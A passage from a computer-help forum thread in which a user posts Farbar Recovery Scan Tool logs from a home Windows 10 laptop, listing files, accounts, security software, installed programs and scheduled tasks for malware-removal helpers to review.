    2017-01-31 23:31 - 2016-10-18 20:11 - 00000000 ____D C:\Users\Joseph\AppData\Local\ElevatedDiagnostics
    2017-01-31 23:05 - 2016-09-23 11:59 - 00000368 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job
    2017-01-31 23:03 - 2017-01-02 16:12 - 00087912 _____ C:\Users\Joseph\Desktop\A79BE330
    2017-01-31 21:05 - 2016-09-29 09:23 - 00003264 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForJoseph
    2017-01-31 20:50 - 2016-10-09 20:00 - 00000000 ____D C:\Program Files (x86)\ShopTracker
    2017-01-31 20:39 - 2016-10-29 21:14 - 00000000 ____D C:\ProgramData\boost_interprocess
    2017-01-30 21:00 - 2016-10-09 20:01 - 00000000 ____D C:\Users\Joseph\AmazonMeter
    2017-01-28 18:25 - 2016-10-01 10:34 - 00000000 ____D C:\Users\Joseph\Desktop\Bank School
    2017-01-25 00:38 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
    2017-01-21 21:06 - 2016-09-29 08:55 - 00357720 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2017-01-21 20:43 - 2015-10-30 01:28 - 00000000 ____D C:\Users\Default.migrated
    2017-01-21 09:20 - 2016-09-23 17:44 - 00000000 ____D C:\ProgramData\Skype
    2017-01-20 18:50 - 2016-12-15 07:50 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
    2017-01-20 18:49 - 2016-09-22 19:45 - 00002377 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
    2017-01-20 18:49 - 2016-09-22 19:45 - 00000000 ___RD C:\Users\Joseph\OneDrive
    2017-01-19 18:39 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ELAMBKUP
    2017-01-18 22:54 - 2016-09-28 12:54 - 00000000 ____D C:\Users\Joseph\Documents\UserTesting
    2017-01-18 22:27 - 2016-09-22 20:21 - 00000000 ____D C:\Users\Joseph\AppData\Local\UserTestingPlugin
    2017-01-15 15:52 - 2016-11-09 10:50 - 00000000 ____D C:\Users\Joseph\Documents\TurboTax
    2017-01-15 15:45 - 2016-11-09 10:48 - 00000479 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
    2017-01-15 15:30 - 2016-11-09 10:49 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Intuit
    2017-01-15 15:30 - 2016-11-09 10:46 - 00000000 ____D C:\Program Files (x86)\TurboTax
    2017-01-15 14:07 - 2016-07-16 06:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2017-01-15 14:05 - 2016-04-01 13:57 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2017-01-13 19:46 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
    2017-01-13 15:56 - 2016-09-29 08:59 - 00168695 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
    2017-01-13 15:56 - 2016-09-29 08:59 - 00002081 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\B&O Play Audio Control.lnk
    2017-01-13 15:56 - 2016-09-29 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
    2017-01-13 15:56 - 2016-08-06 13:49 - 00000000 ___HD C:\Program Files (x86)\Temp
    2017-01-13 15:53 - 2016-08-06 13:49 - 05523456 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
    2017-01-13 15:53 - 2016-08-06 13:49 - 03503048 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 03201376 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02995000 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02839520 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\RtlExUpd.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00192976 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00023688 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
    2017-01-13 15:53 - 2016-04-01 13:31 - 00000000 ____D C:\SWSetup
    2017-01-12 11:14 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
    2017-01-11 00:22 - 2015-11-02 13:02 - 00000000 __RHD C:\Users\Public\AccountPictures
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\oobe
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\Provisioning
    2017-01-10 23:28 - 2016-09-23 16:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2017-01-10 23:25 - 2016-09-23 16:25 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2017-01-10 17:37 - 2016-09-22 19:47 - 00000000 ____D C:\ProgramData\Malwarebytes
    2017-01-08 21:19 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Adobe
    2017-01-08 20:09 - 2016-10-29 21:27 - 00000000 ____D C:\Program Files\Adobe
    2017-01-08 20:02 - 2016-10-29 21:33 - 00000000 ____D C:\ProgramData\regid.1986-12.com.adobe
    2017-01-08 19:54 - 2016-10-29 21:14 - 00000000 __RHD C:\Users\Joseph\[email protected] Creative Cloud Files
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001309 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001297 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
    2017-01-08 19:49 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Local\VirtualStore
    2017-01-06 16:13 - 2016-09-29 08:57 - 00000000 ____D C:\Program Files (x86)\Intel
    2017-01-06 16:13 - 2016-09-22 19:54 - 00000000 ____D C:\ProgramData\Intel
    2017-01-06 16:11 - 2016-09-29 08:58 - 00000000 ____D C:\Program Files\Intel

    ==================== Files in the root of some directories =======

    2017-01-31 23:27 - 2017-01-31 23:27 - 0000017 _____ () C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-02-01 08:27 - 2017-02-01 08:27 - 0047353 _____ () C:\ProgramData\agent.1485955633.bdinstall.bin
    2016-11-30 08:18 - 2016-11-30 08:18 - 0000057 _____ () C:\ProgramData\Ament.ini
    2017-02-01 08:47 - 2017-02-01 08:47 - 0403991 _____ () C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:52 - 2017-02-01 08:52 - 0056949 _____ () C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 16:52 - 2017-02-01 16:52 - 0040137 _____ () C:\ProgramData\dm.1485985887.bdinstall.bin
    2016-11-09 10:48 - 2017-01-15 15:45 - 0000479 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

    ==================== Bamital & volsnap ======================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

    LastRegBack: 2017-01-23 10:44

    ==================== End of FRST.txt ============================


    • 0

    #10
    mw201

    mw201

      Member

    • Topic Starter
    • Member
    • PipPip
    • 15 posts

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
    Ran by Joseph (02-02-2017 12:07:24)
    Running from C:\Users\Joseph\Downloads
    Windows 10 Home Version 1607 (X64) (2016-09-29 14:26:58)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-2731509489-3924948741-1415746157-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-2731509489-3924948741-1415746157-503 - Limited - Disabled)
    Guest (S-1-5-21-2731509489-3924948741-1415746157-501 - Limited - Disabled)
    Joseph (S-1-5-21-2731509489-3924948741-1415746157-1001 - Administrator - Enabled) => C:\Users\Joseph

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: Bitdefender Antivirus (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
    AS: Bitdefender Antispyware (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
    Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.8 - Adobe Systems Incorporated)
    Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
    Awakening: The Dreamless Castle (x32 Version: 3.0.2.51 - WildTangent) Hidden
    Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
    Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.21.970 - Bitdefender)
    Bitdefender Device Management (HKLM\...\Bitdefender Device Management) (Version: 21.0.23.1101 - Bitdefender)
    Bitdefender Total Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
    Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
    Citrix Receiver 4.5 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.5.0.10018 - Citrix Systems, Inc.)
    CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.4.6527 - CyberLink Corp.)
    CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.6.4925 - CyberLink Corp.)
    CyberLink PowerDirector 12 (Version: 12.0.6.4925 - CyberLink Corp.) Hidden
    Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
    Dropbox 25 GB (HKLM-x32\...\{736A97C6-8766-3699-84A9-71736C5E0CE3}) (Version: 3.1.11.0 - Dropbox, Inc.)
    Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
    Energy Star (HKLM\...\{5CB22648-35F8-41BC-9C35-1E41FE6E12A5}) (Version: 1.1.1 - HP Inc.)
    Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
    Green City: Go South (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Hoyle Illusions Mahjongg (x32 Version: 3.0.2.59 - WildTangent) Hidden
    HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
    HP CoolSense (HKLM-x32\...\{0C723C74-62DF-4B35-9490-A207546D866D}) (Version: 2.21.4 - HP Inc.)
    HP Documentation (HKLM\...\HP_Documentation) (Version: 1.0.0.1 - HP Inc.)
    HP ePrint SW (HKLM-x32\...\{88970959-baf7-4864-a39a-69a58e8ae5cf}) (Version: 5.0.18701 - HP)
    HP Photosmart 6520 series Basic Device Software (HKLM\...\{1151BCF8-3246-4E34-9C17-22E66318C41C}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Photosmart 6520 series Help (HKLM-x32\...\{D3293275-1002-41F5-BC37-099B4251FF5B}) (Version: 28.0.0 - Hewlett Packard)
    HP Photosmart 6520 series Product Improvement Study (HKLM\...\{F144E07C-4019-4092-BE25-B57819C97D2F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8318.5320 - Hewlett-Packard)
    HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.3.50.9 - HP)
    HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.5.32.203 - HP)
    HP Sure Connect (HKLM-x32\...\{6468C4A5-E47E-405F-B675-A70A70983EA6}) (Version: 1.0.0.27 - HP Inc.)
    HP System Event Utility (HKLM-x32\...\{09D0DB68-90EA-4015-983E-A0BD777D5A02}) (Version: 1.4.10 - HP Inc.)
    HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
    HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - HP Inc.)
    HP Wireless Button Driver (HKLM-x32\...\{AF4C5F64-4E6A-438B-9832-8BDEE0E7B43D}) (Version: 1.1.17.1 - HP)
    IGT Slots Fire Rubies (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
    Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10608.329 - Intel Corporation)
    Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.2.1183 - Intel Corporation)
    Intel® PRO/Wireless Driver (HKLM\...\{edcc2d98-dba0-4914-ba46-6dae7352cea9}) (Version: 19.20.0000.5007 - Intel Corporation)
    Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4454 - Intel Corporation)
    Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.8.0.1042 - Intel Corporation)
    Intel® WiDi (HKLM\...\{6B15F1EF-F3A8-4C29-BF9E-18EB3683A83D}) (Version: 6.0.60.0 - Intel Corporation)
    Intel® WiDi Software Asset Manager (x32 Version: 3.2.1184 - Intel Corporation) Hidden
    Intel® Wireless Bluetooth® (HKLM-x32\...\{3920BCB0-23AA-4D0D-93E5-404692DAF9D2}) (Version: 19.00.1621.3340 - Intel Corporation)
    Intel® PROSet/Wireless Software (HKLM-x32\...\{d5572863-793c-4ec8-872a-43cccc68b948}) (Version: 18.40.0 - Intel Corporation)
    Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Little Boy: Walter's Scooter (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
    Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.7571.2109 - Microsoft Corporation)
    Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
    Microsoft OneDrive (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Mozilla Firefox 51.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 en-US)) (Version: 51.0.1 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1 - Mozilla)
    Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Licensing Component (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Online Plug-in (x32 Version: 14.5.0.10018 - Citrix Systems, Inc.) Hidden
    Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
    PuppetShow: Return to Joyville (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Pyro Jump (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21287 - Realtek Semiconduct Corp.)
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.6.1001.2015 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8004 - Realtek Semiconductor Corp.)
    Regency Solitaire (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Self-service Plug-in (x32 Version: 4.5.0.14155 - Citrix Systems, Inc.) Hidden
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
    Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.)
    swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
    Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.11.37 - Synaptics Incorporated)
    Tasty Blue (x32 Version: 3.0.2.59 - WildTangent) Hidden
    The Far Kingdoms (x32 Version: 1.1.2.4 - WildTangent) Hidden
    TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc)
    Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
    UserTesting (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\UserTestingPlugin) (Version:  - UserTesting.com)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
    WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.1.0.28 - WildTangent)
    WildTangent Games App for HP (x32 Version: 4.1.1.2 - WildTangent) Hidden

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {00DA6CEA-186D-4563-AC42-5D9024D5EE93} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {020EC6C1-8FC5-4E00-8AA3-DEEFEF76BC4F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe
    Task: {02741E5B-6CB0-4785-8138-B76C8FFECD36} - System32\Tasks\AdobeAAMUpdater-1.0-LAPTOP-Q6I7UJ7H-Joseph => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
    Task: {037E6CC1-F2A7-4570-94C3-34EFFF7FEF81} - System32\Tasks\HPCeeScheduleForJoseph => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-01-22] (Hewlett-Packard)
    Task: {0D314300-9FF5-4A1E-8A6E-02DAC03B2F5A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {28815AC6-2D9D-4DB2-9B9B-C15782F58F17} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {2B726BAB-E9B6-4B18-A788-E1550EBC27D3} - System32\Tasks\HPCustParticipation HP Photosmart 6520 series => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
    Task: {2CA50760-ECC6-4AE8-ABC0-7786D4ABD805} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2016-10-21] (Bitdefender)
    Task: {31E6B1DE-6E6C-4EC4-BF0D-F5B3822B798F} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
    Task: {334761BD-5E77-4258-B1B3-3EBE4E9225C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
    Task: {49F9DD57-0D8B-44AC-B3D2-0E9318CE1D6F} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {4A95B853-DC77-486C-853C-03F94CAE8DE7} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2015-06-05] (Intel Corporation)
    Task: {56B055C5-6236-4075-A0A4-E2627BB3183B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {5C39963E-E07B-4DD3-BE48-6B43D7E7C731} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {5F53EEE8-4920-4181-806B-2DE65B82BAD7} - System32\Tasks\{832C82D8-6868-4CD7-AF1B-10388CE0E534} => Chrome.exe hxxp://ui.skype.com/ui/0/7.27.0.101/en/abandoninstall?source=lightinstaller&amp;page=tsInstall
    Task: {6EEBD8FF-375F-4F22-AA35-1697FE268304} - System32\Tasks\HP\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe [2016-01-21] (HP Development Company, L.P.)
    Task: {794EC38E-0A13-4104-86A7-8F27C70DA1BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {7A53628B-0D5A-4368-AD0B-4DF307943007} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {891256ED-2188-45B6-9656-46B60828F7EB} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Joseph\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
